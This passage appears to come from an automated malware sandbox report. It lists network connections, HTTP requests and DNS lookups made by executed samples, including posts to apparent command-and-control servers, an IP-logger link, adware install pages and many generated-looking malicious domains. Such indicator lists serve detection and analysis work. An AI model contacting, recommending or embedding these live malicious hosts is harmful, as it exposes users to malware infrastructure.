                                                                                          3.1kB
                                                                                          64
                                                                                          40
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          978 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 5.61.43.76:80
                                                                                          http://nusurtal4f.net/
                                                                                          http
                                                                                          812 B
                                                                                          413 B
                                                                                          7
                                                                                          5

                                                                                          HTTP Request

                                                                                          POST http://nusurtal4f.net/

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          2.8kB
                                                                                          7.5kB
                                                                                          14
                                                                                          15
                                                                                        • 31.13.83.36:443
                                                                                          https://www.facebook.com/
                                                                                          tls, http
                                                                                          ufgaa.exe
                                                                                          6.1kB
                                                                                          269.3kB
                                                                                          111
                                                                                          199

                                                                                          HTTP Request

                                                                                          GET https://www.facebook.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 88.218.92.148:80
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e
                                                                                          http
                                                                                          ufgaa.exe
                                                                                          1.2kB
                                                                                          800 B
                                                                                          8
                                                                                          7

                                                                                          HTTP Request

                                                                                          GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          POST http://uyg5wye.2ihsfa.com/api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 88.99.66.31:443
                                                                                          https://iplogger.org/18hh57
                                                                                          tls, http
                                                                                          ufgaa.exe

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 35.201.70.46:80
                                                                                          www.directdexchange.com
                                                                                          MicrosoftEdgeCP.exe
                                                                                          190 B
                                                                                          92 B
                                                                                          4
                                                                                          2
                                                                                        • 54.91.59.199:443
                                                                                          https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.5kB
                                                                                          5.5kB
                                                                                          15
                                                                                          11

                                                                                          HTTP Request

                                                                                          GET https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 54.91.59.199:443
                                                                                          dist.acnav.online
                                                                                          tls
                                                                                          MicrosoftEdgeCP.exe
                                                                                          849 B
                                                                                          4.9kB
                                                                                          12
                                                                                          8
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/images/install-step1-chrome.png
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          4.5kB
                                                                                          63.6kB
                                                                                          60
                                                                                          54

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/js/global.min.js

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/images/install-step1-chrome.png

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/layouts/box/box.css
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.3kB
                                                                                          10.1kB
                                                                                          25
                                                                                          20

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/config.min.js

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/layouts/box/box.css

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/links.json
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.9kB
                                                                                          27.7kB
                                                                                          32
                                                                                          27

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/images/install-step2.png

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/links.json

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/lang/box/ePedia
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.9kB
                                                                                          25.8kB
                                                                                          31
                                                                                          26

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/images/install-step3.png

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/lang/box/ePedia

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/logo.png
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.1kB
                                                                                          15.4kB
                                                                                          23
                                                                                          19

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/logo.png

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/background.png
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          3.9kB
                                                                                          73.5kB
                                                                                          62
                                                                                          58

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/background.png

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 142.250.179.202:443
                                                                                          ajax.googleapis.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.6kB
                                                                                          39.2kB
                                                                                          41
                                                                                          35
                                                                                        • 142.250.179.202:443
                                                                                          ajax.googleapis.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.0kB
                                                                                          3.8kB
                                                                                          13
                                                                                          10
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/favicon.ico
                                                                                          tls, http
                                                                                          MicrosoftEdge.exe
                                                                                          1.3kB
                                                                                          5.3kB
                                                                                          15
                                                                                          10

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/favicon.ico

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.91.59.199:443
                                                                                          https://www.acnav.online/resources/Wiki/favicon.ico
                                                                                          tls, http
                                                                                          MicrosoftEdge.exe
                                                                                          3.1kB
                                                                                          60.4kB
                                                                                          54
                                                                                          50

                                                                                          HTTP Request

                                                                                          GET https://www.acnav.online/resources/Wiki/favicon.ico

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 104.16.18.94:443
                                                                                          cdnjs.cloudflare.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.6kB
                                                                                          8.7kB
                                                                                          18
                                                                                          16
                                                                                        • 104.16.18.94:443
                                                                                          cdnjs.cloudflare.com
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          979 B
                                                                                          3.5kB
                                                                                          12
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.0kB
                                                                                          6.3kB
                                                                                          10
                                                                                          11
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 172.217.17.51:443
                                                                                          accounts.snapchat.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          6.2kB
                                                                                          14.7kB
                                                                                          26
                                                                                          30
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 82.118.23.111:80
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          http
                                                                                          756 B
                                                                                          443 B
                                                                                          7
                                                                                          6

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 31.13.83.52:443
                                                                                          i.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          4.8kB
                                                                                          9.1kB
                                                                                          15
                                                                                          18
                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002002131-service1002.space
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002002131-service1002.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002002231-service1002.space
                                                                                          dns
                                                                                          92 B
                                                                                          157 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002002231-service1002.space

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder3100231-service1002.space
                                                                                          dns
                                                                                          89 B
                                                                                          154 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder3100231-service1002.space

                                                                                          999080321newfolder471-service10020125999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder471-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder351-service10020125999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder351-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder241-service10020125999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder241-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-service100201shop25999080321.ru
                                                                                          dns
                                                                                          100 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-service100201shop25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-service100201life25999080321.ru
                                                                                          dns
                                                                                          100 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-service100201life25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-service100201blog25999080321.ru
                                                                                          dns
                                                                                          100 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-service100201blog25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          dns
                                                                                          188 B
                                                                                          310 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321megatest251-service10020125999080321.ru

                                                                                          DNS Request

                                                                                          999080321megatest251-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321infotest341-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321infotest341-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321besttest971-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321besttest971-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321shoptest871-service10020125999080321.ru
                                                                                          dns
                                                                                          160 B
                                                                                          306 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321shoptest871-service10020125999080321.ru

                                                                                          DNS Request

                                                                                          ka-f.fontawesome.com

                                                                                          DNS Response

                                                                                          172.64.133.9
                                                                                          172.64.132.9

                                                                                        • 8.8.8.8:53
                                                                                          999080321kupitest451-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321kupitest451-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321proftest981-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321proftest981-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321clubtest561-service10020125999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321clubtest561-service10020125999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321mytest151-service1002012425999080321.ru
                                                                                          dns
                                                                                          94 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321mytest151-service1002012425999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfoldert161-service1002012425999080321.ru
                                                                                          dns
                                                                                          98 B
                                                                                          159 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfoldert161-service1002012425999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100251-service25999080321.ru
                                                                                          dns
                                                                                          92 B
                                                                                          153 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder100251-service25999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100241-service10020999080321.ru
                                                                                          dns
                                                                                          95 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder100241-service10020999080321.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100231-service1022020.ru
                                                                                          dns
                                                                                          88 B
                                                                                          149 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder100231-service1022020.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          dns
                                                                                          176 B
                                                                                          298 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321newfolder100221-service1022020.ru

                                                                                          DNS Request

                                                                                          999080321newfolder100221-service1022020.ru

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012525999080321.ml
                                                                                          dns
                                                                                          87 B
                                                                                          145 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012525999080321.ml

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012625999080321.ga
                                                                                          dns
                                                                                          174 B
                                                                                          290 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012625999080321.ga

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012625999080321.ga

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012725999080321.cf
                                                                                          dns
                                                                                          87 B
                                                                                          146 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012725999080321.cf

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012825999080321.gq
                                                                                          dns
                                                                                          87 B
                                                                                          160 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012825999080321.gq

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-012925999080321.com
                                                                                          dns
                                                                                          88 B
                                                                                          161 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-012925999080321.com

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01302599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01302599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01312599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01312599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01322599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01322599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01332599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          156 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01332599908032135.site

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01342599908032135.site
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iplogger.org

                                                                                          DNS Response

                                                                                          88.99.66.31

                                                                                        • 8.8.8.8:53
                                                                                          requested404.com
                                                                                          dns
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          62 B
                                                                                          78 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          requested404.com

                                                                                          DNS Response

                                                                                          63.250.33.126

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.iyiqian.com
                                                                                          dns
                                                                                          15D6.exe
                                                                                          61 B
                                                                                          77 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.iyiqian.com

                                                                                          DNS Response

                                                                                          103.155.92.58

                                                                                        • 8.8.8.8:53
                                                                                          www.tinyore.com
                                                                                          dns
                                                                                          15D6.exe
                                                                                          61 B
                                                                                          77 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.tinyore.com

                                                                                          DNS Response

                                                                                          188.225.87.175

                                                                                        • 8.8.8.8:53
                                                                                          privateinvestig8tor.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          69 B
                                                                                          85 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          privateinvestig8tor.com

                                                                                          DNS Response

                                                                                          162.0.220.187

                                                                                        • 8.8.8.8:53
                                                                                          iplogger.org
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iplogger.org

                                                                                          DNS Response

                                                                                          88.99.66.31

                                                                                        • 8.8.8.8:53
                                                                                          microsoft.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          59 B
                                                                                          139 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          microsoft.com

                                                                                          DNS Response

                                                                                          104.215.148.63
                                                                                          40.76.4.15
                                                                                          40.112.72.205
                                                                                          40.113.200.201
                                                                                          13.77.161.179

                                                                                        • 8.8.8.8:53
                                                                                          api.ip.sb
                                                                                          dns
                                                                                          26F0.exe
                                                                                          55 B
                                                                                          145 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          api.ip.sb

                                                                                          DNS Response

                                                                                          104.26.12.31
                                                                                          104.26.13.31
                                                                                          172.67.75.172

                                                                                        • 8.8.8.8:53
                                                                                          microsoft.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          59 B
                                                                                          113 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          microsoft.com

                                                                                        • 8.8.8.8:53
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          87 B
                                                                                          119 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          microsoft-com.mail.protection.outlook.com

                                                                                          DNS Response

                                                                                          104.47.53.36
                                                                                          40.93.212.0

                                                                                        • 8.8.8.8:53
                                                                                          connectini.net
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          60 B
                                                                                          76 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          connectini.net

                                                                                          DNS Response

                                                                                          162.0.210.44

                                                                                        • 8.8.8.8:53
                                                                                          google.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          56 B
                                                                                          72 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          google.com

                                                                                          DNS Response

                                                                                          172.217.168.206

                                                                                        • 8.8.8.8:53
                                                                                          sergeevih43.tumblr.com
                                                                                          dns
                                                                                          31DF.exe
                                                                                          68 B
                                                                                          100 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          sergeevih43.tumblr.com

                                                                                          DNS Response

                                                                                          74.114.154.22
                                                                                          74.114.154.18

                                                                                        • 8.8.8.8:53
                                                                                          g-partners.live
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          61 B
                                                                                          77 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          g-partners.live

                                                                                          DNS Response

                                                                                          176.113.115.136

                                                                                        • 8.8.8.8:53
                                                                                          d.jumpstreetboys.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          66 B
                                                                                          98 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          d.jumpstreetboys.com

                                                                                          DNS Response

                                                                                          172.67.222.38
                                                                                          104.21.62.88

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          cache.uutww77.com
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          63 B
                                                                                          95 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          cache.uutww77.com

                                                                                          DNS Response

                                                                                          172.67.171.54
                                                                                          104.21.29.4

                                                                                        • 8.8.8.8:53
                                                                                          a.xyzgame.vip
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          59 B
                                                                                          91 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          a.xyzgame.vip

                                                                                          DNS Response

                                                                                          104.21.40.13
                                                                                          172.67.173.218

                                                                                        • 8.8.8.8:53
                                                                                          b.xyzgame.cc
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          58 B
                                                                                          90 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          b.xyzgame.cc

                                                                                          DNS Response

                                                                                          172.67.178.136
                                                                                          104.21.51.99

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          ip-api.com
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          56 B
                                                                                          72 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ip-api.com

                                                                                          DNS Response

                                                                                          208.95.112.1

                                                                                        • 8.8.8.8:53
                                                                                          fb.xiaomishop.me
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          94 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          fb.xiaomishop.me

                                                                                          DNS Response

                                                                                          104.18.9.171
                                                                                          104.18.8.171

                                                                                        • 8.8.8.8:53
                                                                                          www.bandersajtebrauch.club
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          72 B
                                                                                          146 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.bandersajtebrauch.club

                                                                                        • 8.8.8.8:53
                                                                                          www.facebook.com
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          62 B
                                                                                          107 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.facebook.com

                                                                                          DNS Response

                                                                                          31.13.83.36

                                                                                        • 8.8.8.8:53
                                                                                          privacytoolsforyoufree.xyz
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          72 B
                                                                                          88 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          privacytoolsforyoufree.xyz

                                                                                          DNS Response

                                                                                          82.118.23.111

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          1privacytoolsforyou.site
                                                                                          dns
                                                                                          70 B
                                                                                          135 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          1privacytoolsforyou.site

                                                                                        • 8.8.8.8:53
                                                                                          www.profitabletrustednetwork.com
                                                                                          dns
                                                                                          78 B
                                                                                          126 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.profitabletrustednetwork.com

                                                                                          DNS Response

                                                                                          192.243.59.13
                                                                                          192.243.59.20
                                                                                          192.243.59.12

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          google.vrthcobj.com
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          65 B
                                                                                          81 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          google.vrthcobj.com

                                                                                          DNS Response

                                                                                          34.97.69.225

                                                                                        • 8.8.8.8:53
                                                                                          google.vrthcobj.com
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          65 B
                                                                                          133 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          google.vrthcobj.com

                                                                                        • 34.97.69.225:53
                                                                                          google.vrthcobj.com
                                                                                          SystemNetworkService
                                                                                          65.1kB
                                                                                          693.1kB
                                                                                          1241
                                                                                          1251
                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          uyg5wye.2ihsfa.com
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          64 B
                                                                                          80 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          uyg5wye.2ihsfa.com

                                                                                          DNS Response

                                                                                          88.218.92.148

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.in-addr.arpa
                                                                                          dns
                                                                                          71 B
                                                                                          129 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.in-addr.arpa

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          x1.c.lencr.org
                                                                                          dns
                                                                                          60 B
                                                                                          165 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          x1.c.lencr.org

                                                                                          DNS Response

                                                                                          104.73.131.204

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          iw.gamegame.info
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          62 B
                                                                                          94 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iw.gamegame.info

                                                                                          DNS Response

                                                                                          104.21.21.221
                                                                                          172.67.200.215

                                                                                        • 8.8.8.8:53
                                                                                          venetrigni.com
                                                                                          dns
                                                                                          60 B
                                                                                          92 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          venetrigni.com

                                                                                          DNS Response

                                                                                          52.20.18.214
                                                                                          54.227.178.166

                                                                                        • 8.8.8.8:53
                                                                                          ol.gamegame.info
                                                                                          dns
                                                                                          SystemNetworkService
                                                                                          62 B
                                                                                          94 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ol.gamegame.info

                                                                                          DNS Response

                                                                                          104.21.21.221
                                                                                          172.67.200.215

                                                                                        • 8.8.8.8:53
                                                                                          trk.lemon-ade.site
                                                                                          dns
                                                                                          64 B
                                                                                          131 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          trk.lemon-ade.site

                                                                                          DNS Response

                                                                                          3.210.231.22
                                                                                          54.210.38.13

                                                                                        • 8.8.8.8:53
                                                                                          afflat3d1.com
                                                                                          dns
                                                                                          59 B
                                                                                          75 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          afflat3d1.com

                                                                                          DNS Response

                                                                                          69.172.200.185

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

